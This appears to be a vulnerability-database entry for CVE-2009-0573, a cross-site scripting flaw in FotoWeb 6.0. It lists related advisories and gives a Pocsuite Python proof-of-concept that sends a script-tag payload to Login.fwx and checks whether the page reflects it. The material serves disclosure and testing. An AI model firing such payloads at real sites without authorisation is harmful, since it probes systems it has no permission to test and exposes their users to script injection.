| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2009-0573 | 9 Feb 200900:00 | – | circl | |
| CVE-2009-0573 | 13 Feb 200917:00 | – | cve | |
| CVE-2009-0573 | 13 Feb 200917:00 | – | cvelist | |
| EUVD-2009-0577 | 7 Oct 202500:30 | – | euvd | |
| CVE-2009-0573 | 13 Feb 200917:30 | – | nvd | |
| Cross site scripting | 13 Feb 200917:30 | – | prion | |
| CVE-2009-0573 | 21 May 202519:34 | – | redhatcve |
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from urlparse import urljoin
class TestPOC(POCBase):
vulID = 'SSV-86055' # vul ID
version = '1'
author = 'hhxx'
vulDate = '2009-02-09'
createDate = '2015-10-22'
updateDate = '2015-10-22'
references = ['https://www.exploit-db.com/exploits/32782/']
name = "FotoWeb 6.0 Login.fwx s Parameter XSS"
appPowerLink = 'www.fotoware.com'
appName = 'FotoWeb'
appVersion = '6.0'
vulType = 'XSS'
desc = '''
FotoWeb 是针对网站发布内容包括文档、图片、pdf、视频等实现归档的工具。
FotoWeb 6.0 (Build 273)版本中存在多个跨站脚本攻击漏洞。
远程攻击者可以借助(1)对cmdrequest/Login.fwx的s参数和(2)对Grid.fwx的搜索参数,
注入任意web脚本或HTML。
CVEID:CVE-2009-0573
CNNVDID:CNNVD-200902-327
'''
# the sample sites for examine
samples = ['']
def _verify(self):
payload = '/fotoweb/cmdrequest/Login.fwx?s="><script>alert(/Sebug23333Test/)</script>'
res = req.get(urljoin(self.url, payload), timeout=5)
return self.parse_verify(res, payload, 'xss')
def parse_verify(self, res, payload, type):
output = Output(self)
result = {}
if type == 'xss' and '>alert(/Sebug23333Test/)' in res.content:
#返回页面包含构造的特殊字段,说明xss存在
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = urljoin(self.url, payload)
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
def _attack(self):
return self._verify()
register(TestPOC)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation